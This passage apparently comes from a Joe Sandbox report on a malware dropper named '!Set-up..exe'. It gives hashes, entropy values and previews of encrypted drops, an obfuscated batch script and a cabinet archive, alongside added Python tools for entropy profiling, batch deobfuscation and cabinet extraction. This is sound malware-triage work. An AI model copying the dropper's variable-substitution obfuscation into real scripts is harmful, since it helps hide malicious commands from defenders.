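    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Assumed cutoff: separates the 7.99x 'Encrypted: true' drops from the 6.6x and
# 5.07 'false' ones on this page. Joe Sandbox's own threshold is not stated.
ENCRYPTED_THRESHOLD = 7.9


def looks_encrypted_or_compressed(data: bytes) -> bool:
    """Entropy alone cannot tell a cipher from a good compressor; both land here."""
    return shannon_entropy_8bit(data) >= ENCRYPTED_THRESHOLD


def entropy_profile(data: bytes, window: int = 4096) -> list:
    """Entropy per fixed-size window. A low-entropy head followed by a high-entropy
    tail is the shape of a loader with an encrypted or packed payload appended."""
    return [shannon_entropy_8bit(data[i:i + window]) for i in range(0, len(data), window)]


def constructed_samples() -> dict:
    """Constructed inputs, not the dropped files: seeded so the numbers reproduce."""
    rng = random.Random(1581739)
    random_blob = bytes(rng.getrandbits(8) for _ in range(65536))
    batch_text = b"Set Korean=c\r\nSet Combined=G\r\nSet Laura=t\r\n" * 512
    return {
        "zeros": bytes(8192),
        "batch_text": batch_text,
        "random_blob": random_blob,
        "text_then_blob": batch_text + random_blob,
    }


if __name__ == "__main__":
    samples = constructed_samples()
    for name, blob in samples.items():
        h = shannon_entropy_8bit(blob)
        flag = looks_encrypted_or_compressed(blob)
        print(f"{name:15s} {len(blob):7d} bytes  entropy={h:.4f}  encrypted={flag}")
    profile = entropy_profile(samples["text_then_blob"])
    print("profile:", " ".join(f"{e:.2f}" for e in profile))
```

Whole-file entropy is what the report gives; the per-window profile is the follow-up a triage analyst wants when a PE reports a middling value like 6.63, because a small encrypted section inside a large uncompressed image pulls the overall number down without disappearing from the profile.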
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):63488
                                                            Entropy (8bit):7.997218193561625
                                                            Encrypted:true
                                                            SSDEEP:1536:Bw4nxRC6h9dFUbZ+MsTogIPlC8aeu67NoURZDNMcI:HnxRpEbdWoxs8puuCaZD0
                                                            MD5:CFCFA68F88E27612AB83EA57018A850C
                                                            SHA1:B403391DD50F8F6DD090E7E0319B611D9BBD2874
                                                            SHA-256:C6A15A8FA80F99E5F34775677B74082A0946FCF2F10AD3827691059821F034F7
                                                            SHA-512:3B361BAF0F93B2F956BAB4EDB48E03A2AB06F2B61583E2A0D023B25C5D5E41A14074E2B7D007672CB63A8E44F25763649C847F338119B9E5FF203ED27AE98248
                                                            Malicious:false
                                                            Preview:..l?.G..d.SB.....E..v.Z._..d$t......'F..G8e...m..Ol.(.L~3[.....n..N...x.(;..W...t.........|..(a.>2.Y........,.C6..L..i&FN...%w%_.s.A....^.4..^..:a../..D>.. .`..#.......#N.,%A..-.{..&.......\v...??.b.f.EGf...$};r.o d@.6[....i...n6.k~.}O....KL.I[.=...H.tijY.I.`/...:j.j.7.....{.7.....@WQ......:....|..... ....L.....~-^.M..(......_hcwW...r.......E.U*(...e.&.H.....7..*.a{Y...U+|^.zH..1p..G.w...i]...6}...8.eB.E..x.O..K<........J;K"D.^..cA........n...4..,..tC..1...Q.e.D.9.........k...H...&FeT..5Xd.p..".0..u.?....2t.%../. ..'A$.1...`....S(..P.>.....-...-7...<.*..2.7;.GyJy..K...L..0.j._b...-iv..Px<5y4(.DEt....u!.b>.)......%G{..}.~...lZ...a....e.nb.... w..nZ.4..NB.g."..`..Z.<)..Y..s..._.&..no. ..f4>.'....XO...QKo#&...'......%..Y.;.&....d.S'..'..#.5b.....Q..q.~.7.O.]...Ynk...>..X.[.P..J....g.....f..n.t.z...R.......9ZD.T....,..V.K.w....A.}1...t....c.8W..8.CC-....r....}....Nd.]7.2..v......... /...ZP.STM;..aT[...^....gP%.aE.h..'.=&.)u..&.=...3.hjq
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):71680
                                                            Entropy (8bit):7.9976781651176445
                                                            Encrypted:true
                                                            SSDEEP:1536:cqVGA8XmJWQDjDhD3rvvbIRdb5gOY4kb+HUjnhM//6AiaPynUZTPb2RZU:c+X8XCdDjVD37v0RwOY4kiWnhM36iPSy
                                                            MD5:32795C14E61648316037781CC1BA12C5
                                                            SHA1:4CA7E78E840E12EE1EC390C3996E1C75EFC5A248
                                                            SHA-256:9E938A13061086921E0961EF7D2F0A89A6B2B33E9D21A1EEC0198D878DF4E536
                                                            SHA-512:3A526AE9C35EE67F5AE951CEB927B8B2CE61EA4B03BEB5ECB941353CE6343A007857160DB689587EC34F712E7C9BC06918454DE73E3792F1F75CB671174BA35E
                                                            Malicious:false
                                                            Preview:l[u.....W.r:3..T...N_.......1..e.O..M....u..Pp.^>...1:.gJC.=...g..C..C.@Y"w)0..aCq.dO.K.h.X4:....r...q......}.{o...p.....n..Z0.d#1.[.........P.n.1.\!W.....;.%.fz9j.2E....6{....G...'X.......=....a.\..t....C.i>=..,...<@\$....[=Qp.c...6._.e......K.......hCS......1..J.q4.MJC...K..-P.LN.C..(.[o......t:G.....S.!...^B..P.=.u_..".oim..'a^X..FYjq..)......'...W"...h...^..XvE.g...C.....W..`.>.......P#..o-m[..}M......g..g..B.-.wS..M)s.....a..(..R..!.06.|N0...P.p.d.iP..0....g.J.B%e.)......d.d...~....2.......k.....J4H?........]..].G.y.WS!......3..)yw...|...T.-..&.q....?..OKk9"......Q@.qN..ZP...h.}..=... ...K.c.7.2Q.@.a....'...24.p.. ....m.T....."..L.{v..A. ....Z..@...G.....S......B.|.._4....Y.O.I..+/..^w.{.%..`.?......P..e......~.S....*.....{,..EQ..yA...-~...E.U^.($!"..!g...r.>....k...&..:T..._..~..Y.TQ.k'..$...g.W."~..qZ....T3...`...e..._...E.J%.'...T../&.2.L..WU........ I..]........l.......5.N0....g_...7.l.0..#...1...\.Z.k%th_.;.Y.....77..&.M...x..
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):56320
                                                            Entropy (8bit):6.652049318870944
                                                            Encrypted:false
                                                            SSDEEP:1536:QUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoU:Xnj0nEoXnmowS2u5hVOoU
                                                            MD5:64ACFD91F0FC989008A694B9F199A57B
                                                            SHA1:8E4E37288AC01A2F48FDF059A0CFC5135C935C17
                                                            SHA-256:6B0C1BB5546B6682CCE559D06DCA34D43A5208C30CEB0DCC18014E45F844E4B8
                                                            SHA-512:02ADE9009A4D732A82E3708374A4CD80319DD6F19AF67841D8246EA7BDD7BA6BEFDE911B9DA8BE9AC9929D12DE4EB8ED69AC965FC795293449E4545281A7F30D
                                                            Malicious:false
                                                            Preview:.....#....u..=L.I...M.Q.Q...B.M......Y........9].].tE.E..t>3...t8.E.PV.u.....I..........M...A.PQj.j.S..x.I.........F;u.r..u...p.Vj...t.I.P..p.I....}.........u..G.f.w.P.u...L.I.P..P.I...tl.u..e......F....F..G....G...G.PWj.j.S..x.I...t=.E....@.E....r.u.j.Sj.V..|.I...t.V.E.P.u.....I...t..E.....].u..}...=x.I.t..u.j...t.I.P...t.Vj...t.I.P...t.Sj...t.I.P..E..t.Pj...t.I.P..E._^[....U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].SVW..3.j.[._..w......G.3..........Q....Y..9w.v......P.M....F;w.r.._^[...V..~..t.3.PPP.v.P.v...0.I.j..v......YY.v...`.I..6.B...Y^.U..QSV.u....M...WVj..1.E.SP....I.....u7..0.I...zu*.6j...t.I.P..p.I..M.....t.V.6PS.u.....I....._^...[..SVW...Sj.3...t.I.P..p.I.....t.j.SP..,.I....._^...[.U..VW.u...3.j...t.I.P..p.I.....t.j.P..(.I....._...^].U....SQQ.M......M.......t..z.....t.....2.M........[..U...dSVWQQ.M..`...Q.
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):143360
                                                            Entropy (8bit):6.659217298088009
                                                            Encrypted:false
                                                            SSDEEP:3072:h0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNP:IbfSCOMVIPPL/sZ7HS3zcNP
                                                            MD5:89B5A26508E16E2564552AE664E91B66
                                                            SHA1:9851FFCBE0015AA2210070E84D7058EA73EC84E4
                                                            SHA-256:EAAF46C77B4F4F937A620D807D58D60882A0310978DBFFC32D469CB025DD45E1
                                                            SHA-512:B5D1CCCC6C632D0138AAE3A6058BEBDDE6811F5CFCA986E36E790F690C7630E7B257E8C6680CE0A7A6A52D3C18CF395634BE5A96B66BE46C9A6A55BB1D35EF91
                                                            Malicious:false
                                                            Preview:..1...Y..x.=....s.... GJ.].3.]..U..U.V..u.....j.^.0.C.........}..v.M......~.....3.@9E.w..l...j"..u...t.S.Z...W.~...0..~.....t.G...0..@I....Z......x..?5|.....0H.89t....:1u..F.....q...A..u.+.A.PSR.EB....._3.[^]..V..V..,.......Y<.u..F....V.R,..Y.F....^..U...d......L.3.E.S.]...l...VW.}..................u.3...........-u...............3.._....}.u"..........u.......h.gJ..`........E.P.\X..Y..t........A.....................................z....E.........|....@.}..u..E........................%.......u...3...2.....3.................3............@...............+..QQ..$....YY..:........=....t.=....u.3.........0...3....4......C..,..................j.^...............;.......3.......;..0...............u.....3........j Y+......3....@..............6.........H...............t.A..3.j X+..V.9................s...........su...t.....2.................jrY;.r..........................0.........+.........;.rm;.s..8..3..F.;.s........@...3.#.....#.........................
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64512
                                                            Entropy (8bit):7.997169431224249
                                                            Encrypted:true
                                                            SSDEEP:1536:oSpmDzqM+54CRjeXU/4xbDjuNUAZy5NH+VOxI4+sdW1g:oSazq54CGUYbD6NXM5NegS45ig
                                                            MD5:464B43F4D2DF8DF1A0D420A378B13284
                                                            SHA1:0C90A0656812B3EF827D920195C5C36841AE17AE
                                                            SHA-256:F0E44F93299CCE792814297DC2A34082B057FFCFBD7320C32B16598367A115E8
                                                            SHA-512:2D07B7C972873D397A9E4A16478C73C864F9C82D86D8EE8EE820BDED709CA3EE6B2C1E709DB52B01A131ED0BFF4881BC922D0BCFDEA512EE02D8A0513E7F1E26
                                                            Malicious:false
                                                            Preview:.az$Q..brYk..c\..5.1..#.h...;.o..*.L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P...*.`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y*......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I.*.\.1..u..*.......%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...|...0fg3..v.oX...^..%Tv...@}V.....|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........|..$....(..Q....y......0!l.j...V.Q....:..\*+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:ASCII text, with very long lines (1359), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):22954
                                                            Entropy (8bit):5.07401746558717
                                                            Encrypted:false
                                                            SSDEEP:384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
                                                            MD5:2E7B0022580A56F4A6645D751E977BC1
                                                            SHA1:5F9942E6359BFEA8EA1407F69DFED3C308551238
                                                            SHA-256:3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
                                                            SHA-512:8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
                                                            Malicious:false
                                                            Preview:Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with very long lines (1359), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):22954
                                                            Entropy (8bit):5.07401746558717
                                                            Encrypted:false
                                                            SSDEEP:384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
                                                            MD5:2E7B0022580A56F4A6645D751E977BC1
                                                            SHA1:5F9942E6359BFEA8EA1407F69DFED3C308551238
                                                            SHA-256:3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
                                                            SHA-512:8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
                                                            Malicious:false
                                                            Preview:Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit
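Added example, not part of the Joe Sandbox report: the two identical 22954-byte ASCII drops above are a batch script whose preview shows single-character assignments (Set Korean=c, Set Combined=G, Set Laura=t) separated by filler lines of hyphenated words. That is the usual cmd.exe variable-substitution obfuscation, where the command actually run is assembled further down from %NAME% references; the preview is cut off before any such line, so the usage lines in the constructed script below are assumptions, while its Set lines and filler lines are copied from the preview. The Python replays the assignments in order and expands each remaining line against the environment as cmd.exe would, which makes the filler fall away because it contains no %...% tokens.

```python
import re

# "Set NAME=value" and the quoted form  set "NAME=value"
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
VAR_RE = re.compile(r"%([^%\r\n]+)%")


def expand_once(line: str, env: dict, keep_unknown: bool = True) -> str:
    """Single-pass %NAME% substitution, as cmd.exe does when it parses a line.
    Names are case-insensitive. A real .bat file turns an undefined %NAME% into
    nothing; keep_unknown=True leaves it in place so it stands out when reading."""
    def sub(m):
        key = m.group(1).lower()
        if key in env:
            return env[key]
        return m.group(0) if keep_unknown else ""
    return VAR_RE.sub(sub, line)


def deobfuscate(script: str, keep_unknown: bool = True):
    """Replay assignments in order and expand every other line against the
    environment as it stood at that point. Returns (env, expanded_lines, changed_lines)."""
    env, expanded, changed = {}, [], []
    for raw in script.splitlines():
        m = SET_RE.match(raw)
        if m:
            # the value may itself reference earlier variables (Set X=%A%%B%)
            env[m.group(1).lower()] = expand_once(m.group(2), env, keep_unknown)
            continue
        line = expand_once(raw, env, keep_unknown)
        expanded.append(line)
        if line != raw:
            changed.append(line)  # filler lines carry no %..% and never land here
    return env, expanded, changed


# Constructed script: the three Set lines and the two filler lines are taken from
# the preview above; the last two lines are an assumed, harmless use of the variables.
SAMPLE_SCRIPT = "\r\n".join([
    "@echo off",
    "Set Korean=c",
    "ufDetermined-Capabilities-Mechanics-Tim-Cruise-",
    "Set Combined=G",
    "qcVTopless-Clinical-Erp-Handled-Barn-Tub-",
    "Set Laura=t",
    "Set Shell=%Korean%md",
    "%Shell% /%Korean% e%Korean%ho %Combined%o%Laura%",
])


def recovered_commands(script: str = SAMPLE_SCRIPT) -> list:
    """Only the lines that changed under expansion, i.e. the assembled commands."""
    return deobfuscate(script)[2]


if __name__ == "__main__":
    env, _, cmds = deobfuscate(SAMPLE_SCRIPT)
    print("variables:", env)
    for c in cmds:
        print("recovered:", c)
```

Delayed expansion (!NAME! with setlocal enabledelayedexpansion), set /a arithmetic and %VAR:~start,len% substring syntax are not handled here; when a script uses them, the recovered lines will still show the tokens verbatim rather than silently wrong values.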
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):59392
                                                            Entropy (8bit):7.996488555959393
                                                            Encrypted:true
                                                            SSDEEP:768:tJd3kcvzRbRlQP1WfW3xYgUdShSaLH4MyeoZGZkM1jufMxT6dZrdJ3:XRPq1WfoJ0abByT2ksjKQT6dZrdV
                                                            MD5:7D627757A86D54CD1B6C057A7DBFCF26
                                                            SHA1:3A73D88A63ED284DDD76305A4D91DEB9275C4C39
                                                            SHA-256:3AAF7017767A1A1FBB1D9A80FA2C5B3C05583D879BE0A0E2F32898076A4D3BA7
                                                            SHA-512:4B43BAB09367F06C762E2BC60ED3452E05C7001B83198C6732BB68C146DECBE6C837891F597092DFE00565B895933ED94EB665AAC6A1CD4A49E9E26EED65986F
                                                            Malicious:false
                                                            Preview:..Y.Jj.8\.. K2..%....f.OP_.3.Yl..d.[....._............L..x..7a5oc@.3..UX=.v. ....R.v.......x..........\.A.)U@...T.l...l..>...n../V.(L...q?.Q".4.6|D...I.\.yL..i.q...h....!..,..?p.....yR.... ..&.b..g..L..IpC..u.."....9..=.-|...B1.).$...6.H'....?_7.*..dkQ.W......1....mps..Vp.D4U.T.....c.B.bH[!.\...!..!}.o.d..l3).......t....W.qc.I..(v....o.b.._r.k#,..).....B@K%.x......hL..w.~....Oo..U5...'...I.@...Qm.......$..I......A..Z.j#..h>6T....cX.`qUB8..<2......Zq1....TG....Fh.=T)).~....]J.......A.G.w}W.&T9..Z@.~.....G.$..........g8........q.p........>..P.....Tv@...g..53.........@...z........|.C&;...S...e.G\u.F..w.fB|.@;O.....6....A...f......+....P.-..i..ey..bi...c`zV..0.......qo*!.q..i..{AU...5..l.`..G.?>r8:..]..R&..,.ZR3F..0.....C}...\...R........t..Oc...V....'`.n8......h.X.`.D..AU..E.P...tP.....&?.e./I.Q....M~.....{K..PD%.u..M]l.;w.....j...W.22..0.n..rl..v.T.....#.m....{...o8..}.D1...a.......2..5..V.)r.v'wl..F...k..@)..u...m....d..$.....qV8.hg..
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):79872
                                                            Entropy (8bit):6.679021710164866
                                                            Encrypted:false
                                                            SSDEEP:1536:S64qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CxiL:J4qv+32eOyKODOSpQSAU4CI
                                                            MD5:7D1725A7C164AD387FBA5007E60E47A7
                                                            SHA1:C4253D862DFDBDB7EAE80F88E5487487E72C9AD4
                                                            SHA-256:03CDD5BDCB6EBCB6CFDB7D5C3A038C1BEACA34FC9C8FBB717BC85F31BBDB797A
                                                            SHA-512:7368DF3D1AF7DE8CA3074ABCE8AB02C6DCD309F9B6818C6ACD4AEBB72985B64253AC66A74E424FDC317CF1B07108616C4636826393707109E2377B4586BEA4DE
                                                            Malicious:false
                                                            Preview:8M.........]..U...,......L.3.E..M.3.SVW8A..}..........H......................y.3.G...;.r......W..........+.+...............3.......3.......3..,...............;.u....k..............7.................3.3....;...0..........0......F..;.u.......,.....tL..ss....0.....,...@..,....1...............,....j.P..0...h....P.("....,..........................3..t.3....0.....B....,.........;.u..tZ..ss....0.....,...C........,....?...............,....j.P..0...h....P.!....,..........................3.3............k....AG............;.................3.j.Y.......................&v.j&X....N!J...4.O!J............W..1............j.P.t.......P..........L!J....H.J.P........P.o_........3.A...;...............u.3.........,...P..........;.u.........t.3.3......0........0......G..;.u..tO..,.....ss....0.....,...C..,....43............SP..0.....,...h....P.. ...../.....,......+...;.........0..........,......P......P..0...SP........3...u.P........,.........PS.......,...@......;...............3.3......
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):119808
                                                            Entropy (8bit):6.588797342871174
                                                            Encrypted:false
                                                            SSDEEP:3072:N7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOm:56AUkB0CThp6vmVnjphfhnS
                                                            MD5:CE605A59DE6379BA8DFAB762376A82DB
                                                            SHA1:0E8D74F537E58AD09E08FB0AF0C2151FD91B953C
                                                            SHA-256:81B6C9D8C798EEB2254ADE6E6A562C55F150198F97B25E550E4740594B679499
                                                            SHA-512:1DBC8184FFC8B5B90F6DEB2BF002364AECDDD779079A349EA875C73AC14BB63A482E23B7E2D201251CFF220081C0D1D069C826E638E9DA0EACCEEC723B867888
                                                            Malicious:false
                                                            Preview:....t.3.PPPhLyL...3.f9.t-3.WWW.u....u.WWW..t.hhyL...WWWhLyL...h.yL...M......_^[..U....SV..M.W.^.S....3...t1W...lq...O..M.f.8.t.W...Xq...M....P......M...;.r.E.;.t.P.......M..f..._^[..U..QQVW3...WWj.V....I..E.Ph....j.WWj.V..X.I...u+.E.PV..h.I..u.Wh........I...WV....I.V..`.I._^..U..SVW..3.3.9W.v3.]....3.f..t......P.E....f9E.t.A...Kf..u....BF;w.r..._^[].......U..QSVW.....tW...u.W....Y.p.3.PPVWj.P....I....t33..j.Z;.|............Q.D...YSPVWj.j..E.....I..E...3._^[..U...(SVWj..M..}.Y.. K....j0Xjxf..}.f..Xf.C..W...x1.}..r..4....:...........f.DE.f.F.f.DM.f...v.y.}.3.f.D.._^[..U....SV..3.W.}...U.C..7.w....wA3.u.A.M...~0.u......QRP.*.....M..W.F.E..U.........E..M.;.|....2._^[..U....S.].VW....W..P.I.f.>...Y...V.|V..Y.....I....}........j..E.VP.....3.f.E..E.P.o...4^f.....V.>V........rhj..E.VP....3.f.E..E.P.o..f.G...]......V..V........r2j..E.VP.|...3.f.E..E.P.So.....f.G.V..U.......t..4^V..U..Y.........j..E.VP.:...3.f.E..E.P..o...4^f.G......]....V.U........rWj..E.VP.....3.f.E..
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:Microsoft Cabinet archive data, 488845 bytes, 11 files, at 0x2c +A "Fwd" +A "Designed", ID 6536, number 1, 29 datablocks, 0x1 compression
                                                            Category:dropped
                                                            Size (bytes):488845
                                                            Entropy (8bit):7.998691987840986
                                                            Encrypted:true
                                                            SSDEEP:12288:XwvCK7QeZkkSjho8hd9kv+25MbW92VDfG4448L29:XEyBW8Nkv35MSYVTxPwA
                                                            MD5:AFA0F6F9328F080270E89AFFF0581506
                                                            SHA1:1C607C64FCA1CDB4E75DBFF2788F7C3B09D21EA6
                                                            SHA-256:40E274B995FF6326EB0F89943CF999743AE9BDA9F314B3D775F62EC71A5F51C2
                                                            SHA-512:1BE681C4CBA19297FA8D4C7339BD6C7F9E76098AFAC72B9283739DEC20B1A1F1444C71AD94BD29654E20E2CB788189969357CF9FF4284EBCB2A5958BCF166274
                                                            Malicious:false
                                                            Preview:MSCF.....u......,...................(..................Y(. .Fwd..8.........Y(. .Designed..0.........Y(. .Balanced............Y(. .Dir............Y(. .Writing............Y(. .Rise..4.........Y(. .Soccer......,.....Y(. .Returning.....]0.....Y(. .Available.....]......Y(. .Ford.....]......Y(. .Race..h...T..CK..\TU..~...U..`TX.c.j-9Z.h.2....2#)...4...$m".Q..Q{...2.]..u.M..@\.r..-.+.l.C....h..>.s..}.......=....9.<..u.sF......$. U=p].$.oMRYK.j..Kq....TU...0.......L8J..b......C);.lER1..1..........F...B....H..%4...j....!.o0a..p...c7&,...3f.....d{.S..Z.{......(Z...H.#.1.._.0g.s.3.`.^mp..1.RY.......d^.&~.(I.U.L.'...PRL..!i...Y."J....$..$..&..q#%.k..x.,...>|......H..T..E........}z.W...&.~.$.......;y..Ez.KR..2....T...-9._.....T.M^m.bR7R..._..n>...xa.$...'.$aU1..y.....@..,.....?m....*...zdA&.....uV.Ka.4..`>...{I.!.d......[M.7..r.k>s..k.s-f.......$.....A;l_=..}.%...R|l..p.@.......U.Y..)xZ..Ru{...?....G.>...`.VR.......AX.!D.z..CX.6.....g)|..(|.........C8z....vA..[.....
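Added example, not part of the Joe Sandbox report: the "File Type" line above was derived from the cabinet's header alone (11 files, CFFILE directory at 0x2c, members "Fwd" and "Designed" with the archive attribute, set ID 6536, 29 data blocks, compression type 1 which is MSZIP), and extrac32.exe is the process the report shows writing the extracted members out. The Python below parses CFHEADER, CFFOLDER and CFFILE the same way, then inflates an MSZIP folder to pull a member out without invoking extrac32. It runs against a constructed one-folder cabinet built by build_sample_cab() with set ID 6536 and two members named after the ones on the page; the 488845-byte dropped cabinet itself is not reproduced, and chained or reserve-bearing cabinets are rejected rather than parsed.

```python
import struct
import zlib

COMPRESSION = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}


def parse_cab(buf: bytes) -> dict:
    """Read CFHEADER, the CFFOLDER table and the CFFILE directory; no data is inflated."""
    if buf[:4] != b"MSCF":
        raise ValueError("not a cabinet (no MSCF signature)")
    (_r1, cb_cabinet, _r2, coff_files, _r3, _vminor, _vmajor,
     n_folders, n_files, flags, set_id, i_cabinet) = struct.unpack_from("<IIIIIBBHHHHH", buf, 4)
    if flags & 0x0007:
        # PREV_CABINET / NEXT_CABINET / RESERVE_PRESENT insert variable-length fields
        # after the fixed header; the dropped cabinet is a single file, so not handled.
        raise NotImplementedError("chained or reserve-bearing cabinet")
    folders, pos = [], 36
    for _ in range(n_folders):
        data_off, n_blocks, ctype = struct.unpack_from("<IHH", buf, pos)
        folders.append({"data_offset": data_off, "blocks": n_blocks,
                        "compression": COMPRESSION.get(ctype & 0xF, hex(ctype))})
        pos += 8
    files, pos = [], coff_files
    for _ in range(n_files):
        size, folder_off, i_folder, _date, _time, attribs = struct.unpack_from("<IIHHHH", buf, pos)
        pos += 16
        end = buf.index(b"\x00", pos)
        name = buf[pos:end].decode("utf-8" if attribs & 0x80 else "latin-1")
        pos = end + 1
        files.append({"name": name, "size": size, "folder": i_folder,
                      "folder_offset": folder_off, "archive": bool(attribs & 0x20)})
    return {"cabinet_size": cb_cabinet, "set_id": set_id, "cabinet_index": i_cabinet,
            "files_at": coff_files, "folders": folders, "files": files}


def extract_member(buf: bytes, name: str) -> bytes:
    """Inflate the MSZIP folder that holds `name` and slice the member out of it."""
    info = parse_cab(buf)
    entry = next(f for f in info["files"] if f["name"] == name)
    folder = info["folders"][entry["folder"]]
    if folder["compression"] != "MSZIP":
        raise NotImplementedError(folder["compression"])
    out, pos = b"", folder["data_offset"]
    for _ in range(folder["blocks"]):
        _csum, cb_data, _cb_uncomp = struct.unpack_from("<IHH", buf, pos)
        pos += 8
        block, pos = buf[pos:pos + cb_data], pos + cb_data
        if block[:2] != b"CK":
            raise ValueError("bad MSZIP block signature")
        # each block is its own raw-deflate stream, but the 32 KiB history carries
        # across blocks, so the previous output is supplied as the dictionary
        d = zlib.decompressobj(wbits=-15, zdict=out[-32768:]) if out else zlib.decompressobj(wbits=-15)
        out += d.decompress(block[2:]) + d.flush()
    return out[entry["folder_offset"]:entry["folder_offset"] + entry["size"]]


def build_sample_cab(members) -> bytes:
    """Constructed one-folder, one-block MSZIP cabinet standing in for the dropped one."""
    plain = b"".join(data for _, data in members)
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    payload = b"CK" + comp.compress(plain) + comp.flush()
    cfdata = struct.pack("<IHH", 0, len(payload), len(plain)) + payload  # checksum 0 = none
    cffiles, off = b"", 0
    for name, data in members:
        # iFolder 0, arbitrary DOS date, time 0, attribs 0x20 = archive ("+A")
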